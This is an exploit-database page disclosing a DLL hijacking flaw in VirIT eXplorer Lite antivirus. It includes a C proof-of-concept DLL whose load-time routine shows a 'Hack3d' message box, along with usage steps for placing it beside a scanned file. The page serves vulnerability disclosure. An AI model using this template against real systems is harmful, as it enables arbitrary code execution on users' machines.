header-logo
Suggest Exploit
vendor:
eXplorer
by:
anT!-Tr0J4n
7.5
CVSS
HIGH
Arbitrary Code Execution
CWE
Product Name: eXplorer
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP sp3

VirIT eXplorer Arbitrary Code Execution

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to scan a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.

Mitigation:

Unknown
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/43506/info

VirIT eXplorer is prone to a vulnerability that lets attackers execute arbitrary code.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to scan a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. 

/*
#VirIT eXplorer Lite DLL Hijacking Exploit (tg-scan.dll)

#Author : anT!-Tr0J4n

#Greetz : Dev-PoinT.com ~ inj3ct0r.com  ~ All Dev-poinT members and my friends

#Email  : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com

#Software Link:http://www.tgsoft.it/tgsoft_home.asp

#Tested on: Windows XP sp3

#Description:Vir.IT 6.7.41 AntiVirus + AntiSpyware + Personal Firewall for your computer
Scan & Clean virus, spyware, trojan, backdoor, bho, dialer, adware,hijacker, keylogger, worm, rootkit, fraudtool & malware


#####################
How  TO use : Compile and rename to tg-scan.dll , create a file in the same dir with one of the following extensions.
            check the result > Hack3d             
#####################

#tg-scan.dll (code)
*/
 
#include "stdafx.h"
 
void init() {
MessageBox(NULL,"anT!-Tr0J4n", "Hack3d",0x00000003);
}
 
 
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
 init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}